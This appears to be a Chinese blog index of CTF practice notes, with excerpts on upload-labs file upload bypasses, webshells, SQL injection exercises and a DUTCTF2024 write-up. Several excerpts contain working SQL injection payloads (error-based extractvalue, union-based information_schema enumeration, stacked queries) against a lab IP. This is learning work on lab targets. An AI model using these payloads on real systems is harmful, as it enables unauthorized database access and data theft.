upload-labs刷题笔记
upload-labs刷题笔记1源代码:
1234567891011121314151617function checkFile() { var file = document.getElementsByName('upload_file')[0].value; if (file == null || file == "") { alert("请选择要上传的文件!"); return false; } //定义允许上传的文件类型 var allow_ext = ".jpg|.png|.gif"; //提取上传文件的类型 var ext_name = file.substring(file.lastIndexOf(".")); //判断上传文件类型是否允许上传 if (allow_ext.indexOf(ext_name + "|") == -1) { ...
文件上传漏洞学习笔记
文件上传漏洞参考文章:https://blog.csdn.net/qq_43390703/article/details/104858705
什么是文件上传漏洞?攻击者上传可执行的动态脚本文件,可以是木马,病毒,恶意脚本或者WebShell等。
什么是webshell?WebShell就是以asp、php、jsp或者cgi等网页文件形式存在的一种命令执行环境,也可以将其称之为一种网页后门。攻击者在入侵了一个网站后,通常会将这些asp或php后门文件与网站服务器web目录下正常的网页文件混在一起,然后使用浏览器来访问这些后门,得到一个命令执行环境,以达到控制网站服务器的目的(可以上传下载或者修改文件,操作数据库,执行任意命令等)。 WebShell后门隐蔽较性高,可以轻松穿越防火墙,访问WebShell时不会留下系统日志,只会在网站的web日志中留下一些数据提交记录。
产生原因
对上传文件的后缀名没有做较为严格的限制
对上传文件的MIMETYPE没有做检查
权限上没有对于上传的文件目录设置不可执行权限
对于web server对于上传文件或者指定目录的行为没有做限制
原理WEB中上传文 ...
20240331刷题日记-sql
20240331刷题日记sql_sample复现找不到注入点,什么都被过滤,想起来有个robots.txt文件,发现hint
1234Only u input the correct password then u can get the flagand wxccc yyds.select * from users where username='$_POST["username"]' and password='$_POST["password"]';
密码必须输入wxccc?username单引号闭合
没思路,去看wp了
根据sql语句,可以加入\使引号改变闭合
payload可以是password=or 1 #&username=admin\
可以看到回显改变了,由于没学python,copy了一下脚本,用的应该是bool盲注
12345678910111213141516171819202122232425262728293031import requestsim ...
20240330刷题日记
2024/3/30 主站刷题1.ez_sql1.测试注入类型 回显 2-1不等于1,字符型
2.判断闭合方式
1‘看报错,得知单引号闭合
3.查列数
group by得2列
4.union select查询
select被过滤,绕过方法也失效,采用报错注入
http://210.30.97.133:28043/?inject=1'||extractvalue(1,concat('$',(database())))||'1'='1
1error 1105 : Unknown XPATH variable at: '$supersqli'
拿表名
发现过滤了==.==号,还过滤了where,查资料发现可以堆叠注入
http://210.30.97.133:28043/?inject=1';show databases;#
1234567891011121314151617181920212223242526272829array(1) { ...
DUTCTF2024 wp
PRTS-8- DUTCTF2024wpweb-数据库初学者先试了试bp和hackbar发现post过去都是404,直接输入框注入
判断闭合方式输入1’
得知闭合方式是单引号
判断列数1’ group by 4,2,3… 确认列数为3
union注入union select 1,2,3无回显,能报错,尝试extractvalue报错注入
数据库名1’ union select 1,extractvalue(1,concat(0x7e,(select database()))),3#
1’ union select 1,extractvalue(1,concat(0x7e,(select group_concat(schema_name) from information_schema.schemata))),3#
表名1’ union select 1,extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema= ...
第一篇文章
博客的搭建1.node.js和git的安装2.hexo框架的安装